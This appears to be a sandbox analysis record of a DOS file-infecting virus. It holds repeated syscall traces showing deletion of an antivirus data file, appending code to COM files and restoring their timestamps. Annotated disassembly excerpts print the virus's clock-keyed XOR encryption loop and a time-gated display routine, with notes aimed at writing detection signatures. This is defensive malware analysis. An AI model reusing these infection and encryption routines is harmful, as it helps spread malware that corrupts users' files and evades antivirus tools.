2018-12-25T12:31:23.611012105Z 64 PC: 1536c | Write file or device (Write 752 bytes on handle 5)
2018-12-25T12:31:23.620268497Z 64 PC: 15376 | Write file or device (Write 35 bytes on handle 5)
2018-12-25T12:31:23.623083115Z 66 PC: 15388 | Move file pointer
2018-12-25T12:31:23.624583961Z 64 PC: 15392 | Write file or device (Write 5 bytes on handle 5)
2018-12-25T12:31:23.631772503Z 87 PC: 153a7 | Get or set file date and time
2018-12-25T12:31:23.637823749Z 62 PC: 153ab | Close file
2018-12-25T12:31:23.645780599Z 67 PC: 153ba | Get or set file attributes
2018-12-25T12:31:23.651397433Z 79 PC: 1519b | Find next file (See above)
2018-12-25T12:31:23.654418293Z 79 PC: 1519b | Find next file (See above)
2018-12-25T12:31:23.656898592Z 67 PC: 1529d | Get or set file attributes (See above)
2018-12-25T12:31:23.666453531Z 61 PC: 152b2 | Open file (See above)
2018-12-25T12:31:23.678845912Z 63 PC: 152c7 | Read file or device (See above)
2018-12-25T12:31:23.684997434Z 66 PC: 152ff | Move file pointer (See above)
2018-12-25T12:31:23.686231431Z 63 PC: 15316 | Read file or device (See above)
2018-12-25T12:31:23.689200312Z 44 PC: 1532a | Get time (See above)
2018-12-25T12:31:23.691587266Z 64 PC: 15338 | Write file or device (See above)
2018-12-25T12:31:23.69481722Z 64 PC: 1536c | Write file or device (See above)
2018-12-25T12:31:23.700625943Z 64 PC: 15376 | Write file or device (See above)
2018-12-25T12:31:23.703172138Z 66 PC: 15388 | Move file pointer (See above)
2018-12-25T12:31:23.704392094Z 64 PC: 15392 | Write file or device (See above)
2018-12-25T12:31:23.710985131Z 87 PC: 153a7 | Get or set file date and time (See above)
2018-12-25T12:31:23.712350574Z 62 PC: 153ab | Close file (See above)
2018-12-25T12:31:23.720097027Z 67 PC: 153ba | Get or set file attributes (See above)
2018-12-25T12:31:23.725748948Z 79 PC: 1519b | Find next file (See above)
2018-12-25T12:31:23.728492082Z 67 PC: 1529d | Get or set file attributes (See above)
2018-12-25T12:31:23.737894467Z 61 PC: 152b2 | Open file (See above)
2018-12-25T12:31:23.744563238Z 63 PC: 152c7 | Read file or device (See above)
2018-12-25T12:31:23.751673675Z 66 PC: 152ff | Move file pointer (See above)
2018-12-25T12:31:23.753164101Z 63 PC: 15316 | Read file or device (See above)
2018-12-25T12:31:23.761669976Z 44 PC: 1532a | Get time (See above)
2018-12-25T12:31:23.764741558Z 64 PC: 15338 | Write file or device (See above)
2018-12-25T12:31:23.76830475Z 64 PC: 1536c | Write file or device (See above)
2018-12-25T12:31:23.776718856Z 64 PC: 15376 | Write file or device (See above)
2018-12-25T12:31:23.779642879Z 66 PC: 15388 | Move file pointer (See above)
2018-12-25T12:31:23.780958416Z 64 PC: 15392 | Write file or device (See above)
2018-12-25T12:31:23.788945624Z 87 PC: 153a7 | Get or set file date and time (See above)
2018-12-25T12:31:23.790350374Z 62 PC: 153ab | Close file (See above)
2018-12-25T12:31:23.798167136Z 67 PC: 153ba | Get or set file attributes (See above)
2018-12-25T12:31:23.805452908Z 79 PC: 1519b | Find next file (See above)
2018-12-25T12:31:23.808456142Z 67 PC: 1529d | Get or set file attributes (See above)
2018-12-25T12:31:23.818439687Z 61 PC: 152b2 | Open file (See above)
2018-12-25T12:31:23.826107697Z 63 PC: 152c7 | Read file or device (See above)
2018-12-25T12:31:23.832754741Z 66 PC: 152ff | Move file pointer (See above)
2018-12-25T12:31:23.834486595Z 63 PC: 15316 | Read file or device (See above)
2018-12-25T12:31:23.841907516Z 44 PC: 1532a | Get time (See above)
2018-12-25T12:31:23.844277456Z 64 PC: 15338 | Write file or device (See above)
2018-12-25T12:31:23.847550946Z 64 PC: 1536c | Write file or device (See above)
2018-12-25T12:31:23.856464443Z 64 PC: 15376 | Write file or device (See above)
2018-12-25T12:31:23.859831482Z 66 PC: 15388 | Move file pointer (See above)
2018-12-25T12:31:23.861439321Z 64 PC: 15392 | Write file or device (See above)
2018-12-25T12:31:23.869325679Z 87 PC: 153a7 | Get or set file date and time (See above)
2018-12-25T12:31:23.870866786Z 62 PC: 153ab | Close file (See above)
2018-12-25T12:31:23.87942853Z 67 PC: 153ba | Get or set file attributes (See above)
2018-12-25T12:31:23.884930458Z 79 PC: 1519b | Find next file (See above)
2018-12-25T12:31:23.887962116Z 67 PC: 1529d | Get or set file attributes (See above)
2018-12-25T12:31:23.897739087Z 61 PC: 152b2 | Open file (See above)
2018-12-25T12:31:23.905255886Z 63 PC: 152c7 | Read file or device (See above)
2018-12-25T12:31:23.911607379Z 66 PC: 152ff | Move file pointer (See above)
2018-12-25T12:31:23.913039034Z 63 PC: 15316 | Read file or device (See above)
2018-12-25T12:31:23.916214502Z 44 PC: 1532a | Get time (See above)
2018-12-25T12:31:23.918227133Z 64 PC: 15338 | Write file or device (See above)
2018-12-25T12:31:23.921079746Z 64 PC: 1536c | Write file or device (See above)
2018-12-25T12:31:23.929561376Z 64 PC: 15376 | Write file or device (See above)
2018-12-25T12:31:23.932644042Z 66 PC: 15388 | Move file pointer (See above)
2018-12-25T12:31:23.934360617Z 64 PC: 15392 | Write file or device (See above)
2018-12-25T12:31:23.947867481Z 87 PC: 153a7 | Get or set file date and time (See above)
2018-12-25T12:31:23.950224859Z 62 PC: 153ab | Close file (See above)
2018-12-25T12:31:23.958137966Z 67 PC: 153ba | Get or set file attributes (See above)
2018-12-25T12:31:23.962663916Z 79 PC: 1519b | Find next file (See above)
2018-12-25T12:31:23.964508296Z 67 PC: 1529d | Get or set file attributes (See above)
2018-12-25T12:31:23.97679044Z 61 PC: 152b2 | Open file (See above)
2018-12-25T12:31:23.983885311Z 63 PC: 152c7 | Read file or device (See above)
2018-12-25T12:31:23.991887231Z 66 PC: 152ff | Move file pointer (See above)
2018-12-25T12:31:23.994856686Z 63 PC: 15316 | Read file or device (See above)
2018-12-25T12:31:23.997733311Z 44 PC: 1532a | Get time (See above)
2018-12-25T12:31:24.001088536Z 64 PC: 15338 | Write file or device (See above)
2018-12-25T12:31:24.011522116Z 64 PC: 1536c | Write file or device (See above)
2018-12-25T12:31:24.020242371Z 64 PC: 15376 | Write file or device (See above)
2018-12-25T12:31:24.024249378Z 66 PC: 15388 | Move file pointer (See above)
2018-12-25T12:31:24.025774058Z 64 PC: 15392 | Write file or device (See above)
2018-12-25T12:31:24.032719907Z 87 PC: 153a7 | Get or set file date and time (See above)
2018-12-25T12:31:24.035866264Z 62 PC: 153ab | Close file (See above)
2018-12-25T12:31:24.043574958Z 67 PC: 153ba | Get or set file attributes (See above)
2018-12-25T12:31:24.048301678Z 79 PC: 1519b | Find next file (See above)
2018-12-25T12:31:24.052318603Z 67 PC: 1529d | Get or set file attributes (See above)
2018-12-25T12:31:24.062892743Z 61 PC: 152b2 | Open file (See above)
2018-12-25T12:31:24.069311777Z 63 PC: 152c7 | Read file or device (See above)
2018-12-25T12:31:24.076680816Z 66 PC: 152ff | Move file pointer (See above)
2018-12-25T12:31:24.078048467Z 63 PC: 15316 | Read file or device (See above)
2018-12-25T12:31:24.080359538Z 44 PC: 1532a | Get time (See above)
2018-12-25T12:31:24.082998601Z 64 PC: 15338 | Write file or device (See above)
2018-12-25T12:31:24.086470156Z 64 PC: 1536c | Write file or device (See above)
2018-12-25T12:31:24.094934619Z 64 PC: 15376 | Write file or device (See above)
2018-12-25T12:31:24.09824046Z 66 PC: 15388 | Move file pointer (See above)
2018-12-25T12:31:24.099611931Z 64 PC: 15392 | Write file or device (See above)
2018-12-25T12:31:24.104085768Z 87 PC: 153a7 | Get or set file date and time (See above)
2018-12-25T12:31:24.10594395Z 62 PC: 153ab | Close file (See above)
2018-12-25T12:31:24.111044093Z 67 PC: 153ba | Get or set file attributes (See above)
2018-12-25T12:31:24.114143396Z 79 PC: 1519b | Find next file (See above)
2018-12-25T12:31:24.116432483Z 67 PC: 1529d | Get or set file attributes (See above)
2018-12-25T12:31:24.125914585Z 61 PC: 152b2 | Open file (See above)
2018-12-25T12:31:24.13324574Z 63 PC: 152c7 | Read file or device (See above)
2018-12-25T12:31:24.139433202Z 87 PC: 153a7 | Get or set file date and time (See above)
2018-12-25T12:31:24.140774171Z 62 PC: 153ab | Close file (See above)
2018-12-25T12:31:24.147817607Z 67 PC: 153ba | Get or set file attributes (See above)
2018-12-25T12:31:24.152698062Z 79 PC: 1519b | Find next file (See above)
2018-12-25T12:31:24.155056105Z 59 PC: 151ac | Change current directory
2018-12-25T12:31:24.159123579Z 71 PC: 151c9 | Get current directory
2018-12-25T12:31:24.162696166Z 59 PC: 151f3 | Change current directory
2018-12-25T12:31:24.1724774Z 59 PC: 1520e | Change current directory
2018-12-25T12:31:24.173774063Z 44 PC: 15212 | Get time 0x15212: cmp dx, 5
; Trace excerpt: time-gated on-screen message (16-bit real-mode code using BIOS INT 10h / INT 16h).
; The preceding trace line shows `cmp dx, 5` at 0x15212 directly after the logged "Get time"
; call, so the display below runs only when DX <= 5 (unsigned compare).  DOS Get time returns
; seconds in DH and hundredths in DL, i.e. the gate is seconds = 0 and hundredths <= 5.
; NOTE(review): the run record that follows this trace has "TimeBased":true, which suggests
; the sandbox varies the clock to reach this branch — confirm; BIOS calls are not in the syscall log.
0x15215: ja 0x15239                        ; DX > 5: skip the display entirely
0x15217: mov ax, 0xd                       ; AH = 0 (set video mode), AL = 0x0D (a graphics mode)
0x1521a: int 0x10
0x1521c: lea si, word ptr [bp + 0x3a4]     ; SI = start of the text to print
0x15220: cld                               ; forward string direction; also the loop head (target of the jmp at 0x1522e)
0x15221: lodsb al, byte ptr [si]           ; fetch the next character
0x15222: or al, al                         ; a zero byte terminates the text
0x15224: je 0x15230
0x15226: mov ah, 0xe                       ; BIOS teletype output of AL
0x15228: xor bh, bh                        ; display page 0
0x1522a: mov bl, 5                         ; foreground colour 5
0x1522c: int 0x10
0x1522e: jmp 0x15220
0x15230: xor ax, ax                        ; AH = 0: block until a key is pressed
0x15232: int 0x16
0x15234: mov ax, 3                         ; AH = 0, AL = 3: back to 80x25 text mode
0x15237: int 0x10
0x15239: push ax                           ; join point for the skip branch; the excerpt ends two instructions later
0x1523a: push bp
2018-12-25T12:31:24.175728287Z 26 PC: 15249 | Set disk transfer address
2018-12-25T12:31:24.176703617Z 9 PC: 12a51 | Display string (String= 'This is a sample! (10.000 bytes)')
2018-12-25T12:31:24.178294247Z 76 PC: 12a56 | Terminate with return code (Return code = '0')

{"DateBased":false,"Day":0,"Month":0,"Year":0,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":11814,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:31:23.486026848Z 26 PC: 15189 | Set disk transfer address
2018-12-25T12:31:23.487918032Z 71 PC: 15193 | Get current directory
2018-12-25T12:31:23.496683943Z 67 PC: 153df | Get or set file attributes
2018-12-25T12:31:23.503676171Z 65 PC: 153e3 | Delete file (Filename = 'ANTI-VIR.DAT')
2018-12-25T12:31:23.511209087Z 67 PC: 153df | Get or set file attributes (See above)
2018-12-25T12:31:23.517767601Z 65 PC: 153e3 | Delete file (See above)
2018-12-25T12:31:23.531949891Z 67 PC: 153df | Get or set file attributes (See above)
2018-12-25T12:31:23.539093579Z 65 PC: 153e3 | Delete file (See above)
2018-12-25T12:31:23.545704829Z 67 PC: 153df | Get or set file attributes (See above)
2018-12-25T12:31:23.552581608Z 65 PC: 153e3 | Delete file (See above)
2018-12-25T12:31:23.559618764Z 78 PC: 1519b | Find first file
2018-12-25T12:31:23.566877298Z 67 PC: 1529d | Get or set file attributes
2018-12-25T12:31:24.162250421Z 61 PC: 152b2 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:31:24.170626292Z 63 PC: 152c7 | Read file or device (Read 5 bytes on handle 5)
2018-12-25T12:31:24.179612486Z 66 PC: 152ff | Move file pointer
2018-12-25T12:31:24.181668617Z 63 PC: 15316 | Read file or device (Read 7 bytes on handle 5)
2018-12-25T12:31:24.184724254Z 44 PC: 1532a | Get time 0x1532a: mov word ptr [bp + 0x40a], dx
; Trace excerpt from the file-write path (16-bit real-mode DOS code, Intel operand order).
; The instruction at 0x1532a, shown on the preceding trace line, saves DX from the
; logged "Get time" call into [bp + 0x40a]; the loop at 0x15351 uses that word as its XOR key.
; The trace logs three consecutive writes after this point (21 + 752 + 35 bytes = 808),
; which matches the size in the sample name.
; NOTE(review): the key changes with the clock, so the 752 encoded bytes likely differ per
; infected file; a signature should rest on the bytes written unencoded — confirm against samples.
0x1532e: mov cx, 0x15                      ; CX = 21 bytes to write
0x15331: lea dx, word ptr [bp + 0x105]     ; DX = bp+0x105, written unencoded; 0x105 + 0x15 = 0x11a, where the encoded region starts
0x15335: pop ax                            ; function code is taken from the stack rather than from an immediate
0x15336: int 0x21                          ; logged by the trace as "Write 21 bytes on handle 5"
0x15338: push ax
0x15339: push bp
0x1533a: mov bp, sp                        ; temporary frame: [bp] = saved BP, [bp + 2] = the AX just pushed
0x1533c: mov word ptr [bp + 2], 0x4001     ; replace the pushed AX with 0x4001 (AH = 0x40 is the DOS write function)
0x15341: pop bp                            ; BP restored; 0x4001 stays on top of the stack, presumably for a later pop ax like the one at 0x15335
0x15342: mov cx, 0x178                     ; 0x178 = 376 words = 752 bytes
0x15345: mov dx, word ptr [bp + 0x40a]     ; DX = saved time word (the key); 0x11a + 0x2f0 = 0x40a, so it sits right after the source region
0x15349: lea si, word ptr [bp + 0x11a]     ; SI = source region
0x1534d: lea di, word ptr [bp + 0x4e2]     ; DI = destination buffer at bp+0x4e2
0x15351: lodsw ax, word ptr [si]           ; loop head: load one word
0x15352: xor ax, dx                        ; XOR it with the 16-bit key
0x15354: stosw word ptr es:[di], ax        ; store the encoded word
0x15355: loop 0x15351                      ; repeat CX times
0x15357: mov cx, 0x2f0                     ; CX = 752, the byte count of the second logged write
0x1535a: lea dx, word ptr [bp + 0x4e2]     ; DX = encoded copy; the excerpt ends before the call itself
2018-12-25T12:31:24.188262379Z 64 PC: 15338 | Write file or device (Write 21 bytes on handle 5)
2018-12-25T12:31:24.191669162Z 64 PC: 1536c | Write file or device (Write 752 bytes on handle 5)
2018-12-25T12:31:24.346365049Z 64 PC: 15376 | Write file or device (Write 35 bytes on handle 5)
2018-12-25T12:31:24.355294649Z 66 PC: 15388 | Move file pointer
2018-12-25T12:31:24.356840224Z 64 PC: 15392 | Write file or device (Write 5 bytes on handle 5)
2018-12-25T12:31:24.364083088Z 87 PC: 153a7 | Get or set file date and time
2018-12-25T12:31:24.366512075Z 62 PC: 153ab | Close file
2018-12-25T12:31:24.577595457Z 67 PC: 153ba | Get or set file attributes
2018-12-25T12:31:24.582853151Z 79 PC: 1519b | Find next file (See above)
2018-12-25T12:31:24.587112616Z 79 PC: 1519b | Find next file (See above)
2018-12-25T12:31:24.590310679Z 67 PC: 1529d | Get or set file attributes (See above)
2018-12-25T12:31:24.601556856Z 61 PC: 152b2 | Open file (See above)
2018-12-25T12:31:24.608961466Z 63 PC: 152c7 | Read file or device (See above)
2018-12-25T12:31:24.617091114Z 66 PC: 152ff | Move file pointer (See above)
2018-12-25T12:31:24.618658899Z 63 PC: 15316 | Read file or device (See above)
2018-12-25T12:31:24.62134879Z 44 PC: 1532a | Get time (See above)
2018-12-25T12:31:24.629342213Z 64 PC: 15338 | Write file or device (See above)
2018-12-25T12:31:24.632921085Z 64 PC: 1536c | Write file or device (See above)
2018-12-25T12:31:24.655490895Z 64 PC: 15376 | Write file or device (See above)
2018-12-25T12:31:24.659470853Z 66 PC: 15388 | Move file pointer (See above)
2018-12-25T12:31:24.661564111Z 64 PC: 15392 | Write file or device (See above)
2018-12-25T12:31:24.669440982Z 87 PC: 153a7 | Get or set file date and time (See above)
2018-12-25T12:31:24.671717738Z 62 PC: 153ab | Close file (See above)
2018-12-25T12:31:24.680926592Z 67 PC: 153ba | Get or set file attributes (See above)
2018-12-25T12:31:24.686505592Z 79 PC: 1519b | Find next file (See above)
2018-12-25T12:31:24.690042436Z 67 PC: 1529d | Get or set file attributes (See above)
2018-12-25T12:31:24.700958478Z 61 PC: 152b2 | Open file (See above)
2018-12-25T12:31:24.708694351Z 63 PC: 152c7 | Read file or device (See above)
2018-12-25T12:31:24.716603576Z 66 PC: 152ff | Move file pointer (See above)
2018-12-25T12:31:24.718209591Z 63 PC: 15316 | Read file or device (See above)
2018-12-25T12:31:24.721000804Z 44 PC: 1532a | Get time (See above)
2018-12-25T12:31:24.723602172Z 64 PC: 15338 | Write file or device (See above)
2018-12-25T12:31:24.727907672Z 64 PC: 1536c | Write file or device (See above)
2018-12-25T12:31:24.737699034Z 64 PC: 15376 | Write file or device (See above)
2018-12-25T12:31:24.740677168Z 66 PC: 15388 | Move file pointer (See above)
2018-12-25T12:31:24.743267663Z 64 PC: 15392 | Write file or device (See above)
2018-12-25T12:31:24.750976511Z 87 PC: 153a7 | Get or set file date and time (See above)
2018-12-25T12:31:24.752687421Z 62 PC: 153ab | Close file (See above)
2018-12-25T12:31:24.76283503Z 67 PC: 153ba | Get or set file attributes (See above)
2018-12-25T12:31:24.76823264Z 79 PC: 1519b | Find next file (See above)
2018-12-25T12:31:24.771849835Z 67 PC: 1529d | Get or set file attributes (See above)
2018-12-25T12:31:24.78359868Z 61 PC: 152b2 | Open file (See above)
2018-12-25T12:31:24.791801369Z 63 PC: 152c7 | Read file or device (See above)
2018-12-25T12:31:24.799627109Z 66 PC: 152ff | Move file pointer (See above)
2018-12-25T12:31:24.80167547Z 63 PC: 15316 | Read file or device (See above)
2018-12-25T12:31:24.805661961Z 44 PC: 1532a | Get time (See above)
2018-12-25T12:31:24.80843056Z 64 PC: 15338 | Write file or device (See above)
2018-12-25T12:31:24.812673961Z 64 PC: 1536c | Write file or device (See above)
2018-12-25T12:31:24.822626447Z 64 PC: 15376 | Write file or device (See above)
2018-12-25T12:31:24.825746164Z 66 PC: 15388 | Move file pointer (See above)
2018-12-25T12:31:24.827772098Z 64 PC: 15392 | Write file or device (See above)
2018-12-25T12:31:24.836700046Z 87 PC: 153a7 | Get or set file date and time (See above)
2018-12-25T12:31:24.838426576Z 62 PC: 153ab | Close file (See above)
2018-12-25T12:31:24.848059152Z 67 PC: 153ba | Get or set file attributes (See above)
2018-12-25T12:31:24.855153633Z 79 PC: 1519b | Find next file (See above)
2018-12-25T12:31:24.858676212Z 67 PC: 1529d | Get or set file attributes (See above)
2018-12-25T12:31:24.870706861Z 61 PC: 152b2 | Open file (See above)
2018-12-25T12:31:24.87951956Z 63 PC: 152c7 | Read file or device (See above)
2018-12-25T12:31:24.887374099Z 66 PC: 152ff | Move file pointer (See above)
2018-12-25T12:31:24.889266669Z 63 PC: 15316 | Read file or device (See above)
2018-12-25T12:31:24.892406124Z 44 PC: 1532a | Get time (See above)
2018-12-25T12:31:24.895470276Z 64 PC: 15338 | Write file or device (See above)
2018-12-25T12:31:24.898997109Z 64 PC: 1536c | Write file or device (See above)
2018-12-25T12:31:24.907907745Z 64 PC: 15376 | Write file or device (See above)
2018-12-25T12:31:24.914175664Z 66 PC: 15388 | Move file pointer (See above)
2018-12-25T12:31:24.915871963Z 64 PC: 15392 | Write file or device (See above)
2018-12-25T12:31:24.923649775Z 87 PC: 153a7 | Get or set file date and time (See above)
2018-12-25T12:31:24.926669119Z 62 PC: 153ab | Close file (See above)
2018-12-25T12:31:24.935587103Z 67 PC: 153ba | Get or set file attributes (See above)
2018-12-25T12:31:24.941942688Z 79 PC: 1519b | Find next file (See above)
2018-12-25T12:31:24.945711152Z 67 PC: 1529d | Get or set file attributes (See above)
2018-12-25T12:31:24.956758747Z 61 PC: 152b2 | Open file (See above)
2018-12-25T12:31:24.964344979Z 63 PC: 152c7 | Read file or device (See above)
2018-12-25T12:31:24.971978393Z 66 PC: 152ff | Move file pointer (See above)
2018-12-25T12:31:24.974340593Z 63 PC: 15316 | Read file or device (See above)
2018-12-25T12:31:24.977523917Z 44 PC: 1532a | Get time (See above)
2018-12-25T12:31:24.980575985Z 64 PC: 15338 | Write file or device (See above)
2018-12-25T12:31:24.991027983Z 64 PC: 1536c | Write file or device (See above)
2018-12-25T12:31:25.00042409Z 64 PC: 15376 | Write file or device (See above)
2018-12-25T12:31:25.00393612Z 66 PC: 15388 | Move file pointer (See above)
2018-12-25T12:31:25.007566513Z 64 PC: 15392 | Write file or device (See above)
2018-12-25T12:31:25.015503104Z 87 PC: 153a7 | Get or set file date and time (See above)
2018-12-25T12:31:25.017643085Z 62 PC: 153ab | Close file (See above)
2018-12-25T12:31:25.028028588Z 67 PC: 153ba | Get or set file attributes (See above)
2018-12-25T12:31:25.033587951Z 79 PC: 1519b | Find next file (See above)
2018-12-25T12:31:25.036949849Z 67 PC: 1529d | Get or set file attributes (See above)
2018-12-25T12:31:25.048962679Z 61 PC: 152b2 | Open file (See above)
2018-12-25T12:31:25.056936274Z 63 PC: 152c7 | Read file or device (See above)
2018-12-25T12:31:25.064482812Z 66 PC: 152ff | Move file pointer (See above)
2018-12-25T12:31:25.066816541Z 63 PC: 15316 | Read file or device (See above)
2018-12-25T12:31:25.070101645Z 44 PC: 1532a | Get time (See above)
2018-12-25T12:31:25.073562584Z 64 PC: 15338 | Write file or device (See above)
2018-12-25T12:31:25.078137992Z 64 PC: 1536c | Write file or device (See above)
2018-12-25T12:31:25.08735577Z 64 PC: 15376 | Write file or device (See above)
2018-12-25T12:31:25.090716965Z 66 PC: 15388 | Move file pointer (See above)
2018-12-25T12:31:25.093400617Z 64 PC: 15392 | Write file or device (See above)
2018-12-25T12:31:25.101344211Z 87 PC: 153a7 | Get or set file date and time (See above)
2018-12-25T12:31:25.103393928Z 62 PC: 153ab | Close file (See above)
2018-12-25T12:31:25.112886026Z 67 PC: 153ba | Get or set file attributes (See above)
2018-12-25T12:31:25.119470391Z 79 PC: 1519b | Find next file (See above)
2018-12-25T12:31:25.122835651Z 67 PC: 1529d | Get or set file attributes (See above)
2018-12-25T12:31:25.133988701Z 61 PC: 152b2 | Open file (See above)
2018-12-25T12:31:25.143529203Z 63 PC: 152c7 | Read file or device (See above)
2018-12-25T12:31:25.151070001Z 87 PC: 153a7 | Get or set file date and time (See above)
2018-12-25T12:31:25.153181986Z 62 PC: 153ab | Close file (See above)
2018-12-25T12:31:25.162141904Z 67 PC: 153ba | Get or set file attributes (See above)
2018-12-25T12:31:25.168019272Z 79 PC: 1519b | Find next file (See above)
2018-12-25T12:31:25.171051965Z 59 PC: 151ac | Change current directory
2018-12-25T12:31:25.176749239Z 71 PC: 151c9 | Get current directory
2018-12-25T12:31:25.18062462Z 59 PC: 151f3 | Change current directory
2018-12-25T12:31:25.192372903Z 59 PC: 1520e | Change current directory
; Clock-gated display routine (excerpt; the code continues past the last line shown).
; The INT 21h call that returns to 0x15212 is logged as "Get time" (op 44 = 2Ch); by DOS
; convention that call returns DH = seconds and DL = hundredths of a second.
; Analysis caveat: the branch below is taken only in about the first 0.06 s of a minute,
; so a dynamic run that does not control the clock will usually not show this path.
2018-12-25T12:31:25.195151858Z 44 PC: 15212 | Get time 0x15212: cmp dx, 5  ; DX <= 5 only when DH (seconds) = 0 and DL (hundredths) <= 5
0x15215: ja 0x15239  ; unsigned compare: every other clock value skips the display
0x15217: mov ax, 0xd  ; AH=00h set video mode, AL=0Dh (320x200 16-colour graphics)
0x1521a: int 0x10
0x1521c: lea si, word ptr [bp + 0x3a4]  ; SI -> zero-terminated text; BP is presumably the delta offset (set outside this excerpt)
0x15220: cld  ; string ops count upward
0x15221: lodsb al, byte ptr [si]  ; AL = next character
0x15222: or al, al  ; zero byte ends the text
0x15224: je 0x15230
0x15226: mov ah, 0xe  ; INT 10h teletype output
0x15228: xor bh, bh  ; display page 0
0x1522a: mov bl, 5  ; foreground colour 5
0x1522c: int 0x10
0x1522e: jmp 0x15220  ; next character
0x15230: xor ax, ax  ; AH=00h: block until a key is pressed
0x15232: int 0x16
0x15234: mov ax, 3  ; restore video mode 03h (80x25 text)
0x15237: int 0x10
0x15239: push ax  ; both paths rejoin here; looks like the start of the stacked-AX sequence at 0x15338 — TODO confirm
0x1523a: push bp
2018-12-25T12:31:25.198878803Z 26 PC: 15249 | Set disk transfer address
2018-12-25T12:31:25.200544893Z 9 PC: 12a51 | Display string (String= 'This is a sample! (10.000 bytes)')
2018-12-25T12:31:25.204359526Z 76 PC: 12a56 | Terminate with return code (Return code = '0')

{"DateBased":false,"Day":0,"Month":0,"Year":0,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":11814,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:31:23.531201168Z 26 PC: 15189 | Set disk transfer address
2018-12-25T12:31:23.542398677Z 71 PC: 15193 | Get current directory
2018-12-25T12:31:23.545742788Z 67 PC: 153df | Get or set file attributes
2018-12-25T12:31:23.552332819Z 65 PC: 153e3 | Delete file (Filename = 'ANTI-VIR.DAT')
2018-12-25T12:31:23.55954016Z 67 PC: 153df | Get or set file attributes (See above)
2018-12-25T12:31:23.572668483Z 65 PC: 153e3 | Delete file (See above)
2018-12-25T12:31:23.583728534Z 67 PC: 153df | Get or set file attributes (See above)
2018-12-25T12:31:23.590123039Z 65 PC: 153e3 | Delete file (See above)
2018-12-25T12:31:23.597034507Z 67 PC: 153df | Get or set file attributes (See above)
2018-12-25T12:31:23.603685375Z 65 PC: 153e3 | Delete file (See above)
2018-12-25T12:31:23.610437329Z 78 PC: 1519b | Find first file
2018-12-25T12:31:23.621949592Z 67 PC: 1529d | Get or set file attributes
2018-12-25T12:31:24.577977894Z 61 PC: 152b2 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:31:24.586492578Z 63 PC: 152c7 | Read file or device (Read 5 bytes on handle 5)
2018-12-25T12:31:24.595419906Z 66 PC: 152ff | Move file pointer
2018-12-25T12:31:24.596957879Z 63 PC: 15316 | Read file or device (Read 7 bytes on handle 5)
; Per-infection XOR encoding of the body before it is appended to the opened file
; (excerpt; the INT 21h that writes the encoded buffer lies past the last line shown).
; The 16-bit key is the DX value returned by the "Get time" call logged on this row, so
; the 752 encoded bytes differ between infected files and make a poor static signature.
; The 21 bytes at [bp+0x105] are written without passing through the XOR loop and end
; exactly where the XOR source begins (0x105 + 0x15 = 0x11a); presumably this is the
; decoder stub and the more stable detection anchor — TODO confirm against the sample.
2018-12-25T12:31:24.599800697Z 44 PC: 1532a | Get time 0x1532a: mov word ptr [bp + 0x40a], dx  ; save DX (seconds:hundredths) as the key
0x1532e: mov cx, 0x15  ; CX = 21 bytes
0x15331: lea dx, word ptr [bp + 0x105]  ; DS:DX -> the 21-byte block
0x15335: pop ax  ; function number comes off the stack; the push is outside this excerpt
0x15336: int 0x21  ; logged at PC 15338 as a 21-byte write on handle 5
0x15338: push ax
0x15339: push bp
0x1533a: mov bp, sp  ; temporary frame: [bp+2] is the AX slot just pushed
0x1533c: mov word ptr [bp + 2], 0x4001  ; overwrite the stacked AX with 4001h (AH=40h is DOS write)
0x15341: pop bp  ; BP restored; the patched word stays on the stack for a later pop
0x15342: mov cx, 0x178  ; 0x178 words = 752 bytes
0x15345: mov dx, word ptr [bp + 0x40a]  ; DX = key saved above
0x15349: lea si, word ptr [bp + 0x11a]  ; source: the body as it sits in memory
0x1534d: lea di, word ptr [bp + 0x4e2]  ; destination: scratch buffer addressed through ES
0x15351: lodsw ax, word ptr [si]  ; direction flag assumed clear; no cld in this excerpt
0x15352: xor ax, dx  ; one-word XOR with the clock-derived key
0x15354: stosw word ptr es:[di], ax
0x15355: loop 0x15351  ; repeat for all CX words
0x15357: mov cx, 0x2f0  ; 752 bytes, matching the write logged at PC 1536c
0x1535a: lea dx, word ptr [bp + 0x4e2]  ; DS:DX -> encoded copy
2018-12-25T12:31:24.6033656Z 64 PC: 15338 | Write file or device (Write 21 bytes on handle 5)
2018-12-25T12:31:24.608059999Z 64 PC: 1536c | Write file or device (Write 752 bytes on handle 5)
2018-12-25T12:31:24.61736133Z 64 PC: 15376 | Write file or device (Write 35 bytes on handle 5)
2018-12-25T12:31:24.621103515Z 66 PC: 15388 | Move file pointer
2018-12-25T12:31:24.622469366Z 64 PC: 15392 | Write file or device (Write 5 bytes on handle 5)
2018-12-25T12:31:24.629617593Z 87 PC: 153a7 | Get or set file date and time
2018-12-25T12:31:24.631623085Z 62 PC: 153ab | Close file
2018-12-25T12:31:24.640042529Z 67 PC: 153ba | Get or set file attributes
2018-12-25T12:31:24.64528795Z 79 PC: 1519b | Find next file (See above)
2018-12-25T12:31:24.648339541Z 79 PC: 1519b | Find next file (See above)
2018-12-25T12:31:24.652489519Z 67 PC: 1529d | Get or set file attributes (See above)
2018-12-25T12:31:24.663452649Z 61 PC: 152b2 | Open file (See above)
2018-12-25T12:31:24.671051974Z 63 PC: 152c7 | Read file or device (See above)
2018-12-25T12:31:24.678556295Z 66 PC: 152ff | Move file pointer (See above)
2018-12-25T12:31:24.680021356Z 63 PC: 15316 | Read file or device (See above)
2018-12-25T12:31:24.682743287Z 44 PC: 1532a | Get time (See above)
2018-12-25T12:31:24.693600638Z 64 PC: 15338 | Write file or device (See above)
2018-12-25T12:31:24.697120896Z 64 PC: 1536c | Write file or device (See above)
2018-12-25T12:31:24.706294891Z 64 PC: 15376 | Write file or device (See above)
2018-12-25T12:31:24.709802067Z 66 PC: 15388 | Move file pointer (See above)
2018-12-25T12:31:24.711234696Z 64 PC: 15392 | Write file or device (See above)
2018-12-25T12:31:24.718378255Z 87 PC: 153a7 | Get or set file date and time (See above)
2018-12-25T12:31:24.720499915Z 62 PC: 153ab | Close file (See above)
2018-12-25T12:31:24.729900408Z 67 PC: 153ba | Get or set file attributes (See above)
2018-12-25T12:31:24.735513811Z 79 PC: 1519b | Find next file (See above)
2018-12-25T12:31:24.7398799Z 67 PC: 1529d | Get or set file attributes (See above)
